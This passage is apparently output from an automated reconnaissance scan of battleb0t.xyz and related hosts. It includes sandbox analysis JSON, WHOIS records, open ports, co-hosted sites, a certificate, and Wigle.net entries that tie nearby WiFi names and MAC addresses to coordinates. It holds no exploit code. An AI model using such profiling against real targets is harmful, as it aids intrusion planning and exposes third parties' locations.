u'"api.k8slens.dev"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\000003.log]- [targetUID: 00000000-00003984]\n "f_00024d" has type "Web Open Font Format (Version 2) TrueType length 25036 version 1.0"- [targetUID: N/A]\n "index" has type "FoxPro FPT blocks size 768 next free block index 3284796353 field type 0 dBase III DBT version number 0 next free block index 3238251203"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\index]- [targetUID: 00000000-00006748]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00003984]\n "f_00023e" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 400x400 components 3"- [targetUID: N/A]\n "Session_13324055852125015" has type "data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- [targetUID: N/A]\n "f_000243" has type "PNG image data 500 x 500 8-bit/color RGB non-interlaced"- [targetUID: N/A]\n "f_00023d" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 400x400 components 3"- [targetUID: N/A]\n "data_2" has type "dBase III DBT version number 0 next free block index 3238316739"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00006748]\n "QuotaManager-journal" has type "SQLite Rollback Journal"- [targetUID: N/A]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00003984]\n "Last Browser" has type "data"- [targetUID: N/A]\n "6d3ef7fa-ecc8-4cf2-87b4-e82371405c12.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "temp-index" has type "data"- [targetUID: N/A]\n "627c3a7f-c957-4f31-952c-cbc35428ddc2.tmp" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "data_1" has type "dBase III DBT version number 0 next free block index 3238316739"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00006748]\n "f4af993c-e56b-444e-bf40-1281122cb7b5.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "data_0" has type "FoxPro FPT blocks size 512 next free block index 3284796609 field type 0 dBase III DBT version number 0 next free block index 3238316739"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_0]- [targetUID: 00000000-00006748]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Service Worker\\Database\\LOG]- [targetUID: 00000000-00003984]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://k8slens.dev/"\n Pattern match: "https://k8slens.dev"\n Pattern match: "https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wtc3?ver=79e5,PORTRAIT:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqHh?ver=0f07,copyright:Yuanping"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applied_policy:block,domain:mozilla.github.io},{applied_policy:block,domain:html5test.com},{applied_policy:block,domain:necromanthus.com},{app"\n Pattern match: "https://*excel.officeapps.live.com/*,https://*onenote.officeapps.live.com/*,https://*powerpoint.officeapps.live.com/*,https://*word-edit.officeapps.live.com/*,https://*excel.partner.officewebapps.cn/*,https://*onenote.partner.officewebapps.cn/*,"\n Pattern match: "https://dns.google,supports_spdy:true},{isolation:[],server:https://edgeassetservice.azureedge.net,supports_spdy:true},{isolation:[],server:https://edge.microsoft.com,supports_spdy:true},{isolation:[],server:https://arc.msn.com,su"\n Pattern match: "https://fonts.googleapis.com,supports_spdy:true},{anonymization:[],server:https://edge.microsoft.com,supports_spdy:true},{alternative_service:[{advertised_alpns:[h3],expiration:13326647883143133,port:443,protocol_str:quic}],anon"\n Pattern match: "http://schemas.microsoft.com/SMI/2005/WindowsSettings"\n Heuristic match: "PATHEXT=.COM;.EXE;.BAT;.CM"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/91 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-5', u'name': u'Sends UDP traffic', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 1, u'type': 7, u'description': u'"UDP connection to 142.251.214.131"\n "UDP connection to 142.251.46.174"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "1.0.0.23" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23"\n Potential IP "1.0.0.23" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23\\Mu"\n Potential IP "1.0.0.23" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23\\Sigma"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.rundll32,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\WINDOWS\\system32\\RunDll32.exe"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.InetCore.ieframe,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\Windows\\System32\\ieframe.dll"\n "192.168.243.25"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.shell32,processorArchitecture="*",type="win32",version="5.1.0.0"C:\\WINDOWS\\WindowsShell.Manifest"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.shell32,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\WINDOWS\\System32\\SHELL32.dll"\n Potential IP "5.1.0.0" found in string "version="5.1.0.0""'}], u'threat_level': 0, u'size': None, u'job_id': u'641c62f03e70d209d706b9d4', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'suspicious_identifiers': [], u'attck_id': u'T1071', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Application Layer Protocol', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent' | 185.199.111.153 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:02:2D:03:10:83) | 37.7813933,-122.3918002 |
| 2023-05-12 02:58:35 | Phone Number | No | Phone Number Extractor | 0 | 0 | 2 | 0 | None | +14806242599 | Domain Name: AYHU.XYZ
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com/
Updated Date: 2023-01-27T12:12:18.0Z
Creation Date: 2022-12-13T18:01:25.0Z
Registry Expiry Date: 2023-12-13T23:59:59.0Z
Registrar: Go Daddy, LLC
Registrar IANA ID: 146
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4805058800
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:06.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayhu.xyz
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-12-13T18:01:26Z
Creation Date: 2022-12-13T18:01:25Z
Registrar Registration Expiration Date: 2023-12-13T23:59:59Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR599348184
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Admin ID: CR599348186
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Tech ID: CR599348185
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:44:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 03:08:53 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.137 | 34.148.97.127 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | AWildAndAnUntamedThing (Net ID: A0:8E:78:0F:4D:DE) | 37.751, -97.822 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/fredo.PNG | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:01:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.103): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:09:50 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 83.170.74.34.bc.googleusercontent.com | 34.74.170.83 |
| 2023-05-12 02:59:11 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 4, u'threat_score': None, u'compromised_hosts': [u'34.74.170.74', u'96.6.31.32'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://www.mailhardener.com/kb/email-address-types-explained', u'signatures': [{u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-2', u'name': u'An application crash occurred', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 0, u'type': 9, u'description': u'Report process "WerFault.exe" was created by "rundll32.exe"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"x1.c.lencr.org"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.74.170.74:443"\n "184.31.135.120:80"\n "96.6.31.32:443"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-25', u'name': u'Spawns new processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "WerFault.exe" with commandline "-u -p 3728 -s 132" (UID: 00000000-00001948)'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarFDEF.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-67', u'name': u'Process launched with changed environment', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 9, u'description': u'Process "WerFault.exe" (UID: 00000000-00001948) was launched with missing environment variables: "PATH"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-103', u'name': u'Spawns new processes that are not known child processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "WerFault.exe" with commandline "-u -p 3728 -s 132" (UID: 00000000-00001948)'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2936"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b78_IE_EarlyTabStart_0x580_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b78_ConnHashTable<2936>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b78_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b78_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "DBWinMutex"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_b78_IESQMMUTEX_0_331"\n "IsoScope_b78_IESQMMUTEX_0_519"\n "IsoScope_b78_IESQMMUTEX_0_303"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "CabFDC0.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61712 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002576]\n "~DF3E880A0438641726.TMP" has type "data"- Location: [%TEMP%\\~DF3E880A0438641726.TMP]- [targetUID: 00000000-00002936]\n "TarFDEF.tmp" has type "data"- Location: [%TEMP%\\TarFDEF.tmp]- [targetUID: 00000000-00002576]\n "~DF1BC890B88EE71D3E.TMP" has type "data"- Location: [%TEMP%\\~DF1BC890B88EE71D3E.TMP]- [targetUID: 00000000-00002936]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00002936]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00002936]\n "~DFA7CC1D957708F1CF.TMP" has type "data"- Location: [%TEMP%\\~DFA7CC1D957708F1CF.TMP]- [targetUID: 00000000-00002936]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00002936]\n "CabFDC0.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- Location: [%TEMP%\\CabFDC0.tmp]- [targetUID: 00000000-00002576]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00002936]\n "QOCAT697.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QOCAT697.txt]- [targetUID: 00000000-00002936]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002936]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002576]\n "103621DE9CD5414CC2538780B4B75751" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\103621DE9CD5414CC2538780B4B75751]- [targetUID: 00000000-00002576]\n "M5GPFNCR.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\M5GPFNCR.txt]- [targetUID: 00000000-00002936]\n "441474DA509340201AE7BB4EF094648C" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\441474DA509340201AE7BB4EF094648C]- [targetUID: 00000000-00002576]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00002936]\n "~DF9E4F20B7A536AEA1.TMP" has type "data"- Location: [%TEMP%\\~DF9E4F20B7A536AEA1.TMP]- [targetUID: 00000000-00002936]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /kb/email-address-types-explained HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.mailhardener.com\nDNT: 1\nConnection: Keep-Alive"- [Source: SSL_34.74.170.74]\n\n "HTTP/1.1 302 Moved Temporarily\nContent-Length: 0\nServer: Kestrel\nLocation: https://www.msn.com/spartan/ientpgbconfig?locale=en-us&market=us\nRequest-Context: appId=cid-v1:7d63747b-487e-492a-872d-762362f77974\nX-Response-Cache-Status: True\nExpires: Thu, 28 Jul 2022 00:27:42 GMT\nCache-Control: max-age=0, no-cache, no-store\nPragma: no-cache\nDate: Thu, 28 Jul 2022 00:27:42 GMT\nConnection: keep-alive\nStrict-Transport-Security: max-age=31536000 ; includeSubDomains"- [Source: SSL_96.6.31.32]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://www.mailhardener.com/kb/email-address-types-explained"- [Source: Input]\n Pattern match: "https://www.mailhardener.com"- [Source: Input]\n Heuristic match: "x1.c.lencr.org" | 34.74.170.74 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | TexasTech94 (Net ID: 8C:3B:AD:4D:21:5C) | 37.751, -97.822 |
| 2023-05-12 03:23:44 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.17:80 | 188.114.96.0/24 |
| 2023-05-12 02:46:50 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | netlify.app | 34.74.170.74 |
| 2023-05-12 03:03:55 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | scoop.sh | 185.199.108.153 |
| 2023-05-12 02:54:18 | Web Content | No | Web Spider | 0 | 0 | 4 | 0 | None | body{
padding-top:70px;
}
.jumbotron{
color: #2c3e50;
background-color: #ecf0f1;
}
.navbar-inverse{
color: #2c3e50;
}
.navbar-inverse .navbar-nav>li>a {
color: white;
}
.navbar-inverse .navbar-brand{
color: white;
} | https://pics.battleb0t.xyz/gallery.css |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | laethof_phone-2 (Net ID: 00:0C:E6:8A:9F:66) | 50.8897, 6.0563 |
| 2023-05-12 02:56:55 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | panel.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:15:41:ea:93:cd:8d:62:0f:07:0f:be:37:47:74:c1:ad:1b
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 17:26:26 2022 GMT
Not After : Feb 15 17:26:25 2023 GMT
Subject: CN=panel.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:aa:4d:69:12:67:d1:ef:14:86:20:9d:cf:2c:a8:
0d:c9:a7:6c:06:2b:6c:f8:9e:1f:f7:5b:41:e3:d6:
87:ca:57:bb:98:07:35:18:67:8f:28:74:6a:04:77:
89:a0:80:85:fc:4d:2e:7a:12:ee:d9:55:9b:e8:51:
03:88:3d:06:0a:14:47:b6:c6:bf:e2:f2:6e:38:57:
77:d8:da:10:9f:18:48:30:90:76:66:83:1b:18:b6:
6d:f9:38:58:a1:cc:7b:d2:96:34:23:9b:ea:85:2c:
bb:61:4a:ef:9a:58:1e:2d:73:fc:eb:20:c5:37:d4:
7c:8e:77:66:2d:b6:0a:4e:0d:e0:f4:1d:87:9f:f3:
39:d7:d9:45:03:a6:8f:40:08:8a:3e:d5:15:b6:01:
8a:08:27:45:ff:cb:af:e5:d1:fd:28:cb:df:75:d3:
f7:db:3d:e9:43:0c:e5:b6:28:89:d2:ba:63:6c:e0:
ac:03:c0:49:9f:2c:e6:11:96:03:1a:33:a3:63:63:
dc:3b:1c:a8:9b:0f:00:ea:cb:bf:0c:39:fd:1c:40:
ab:3a:92:ca:b0:90:5c:21:ed:f1:8e:4f:9e:e7:92:
92:53:94:1d:fa:e2:36:84:fa:2a:17:63:6d:d0:c9:
16:92:48:c8:82:19:57:63:48:56:6e:6a:2e:34:87:
cc:7c:79:cf:43:dc:a4:a2:fb:e4:06:17:02:db:ef:
92:10:48:04:d1:04:89:aa:65:ee:9d:e2:a1:cd:ce:
9c:27:f6:46:3e:9e:91:90:6e:12:78:d2:cd:5e:a3:
75:48:b4:82:f5:c9:29:da:c5:bb:ac:87:af:95:fa:
f8:49:db:fe:e5:df:04:7e:92:10:6e:c8:d7:7b:93:
ef:de:5b:4f:7a:70:41:0c:59:d9:04:5e:26:57:3d:
65:af:57:00:3d:40:e4:ec:3b:92:38:0a:d1:a5:20:
31:40:89:48:9a:58:46:06:1e:56:4f:e5:25:e6:f5:
33:d9:bb:68:90:99:70:c6:a1:93:5a:22:c1:e3:ee:
da:ef:45:a4:37:18:4c:33:42:7e:6f:07:01:85:ed:
36:f3:3f:be:f6:6a:d9:3e:fe:ad:4c:8d:18:3e:0e:
49:d9:7a:95:04:47:e8:2c:a9:fe:24:7a:53:d0:af:
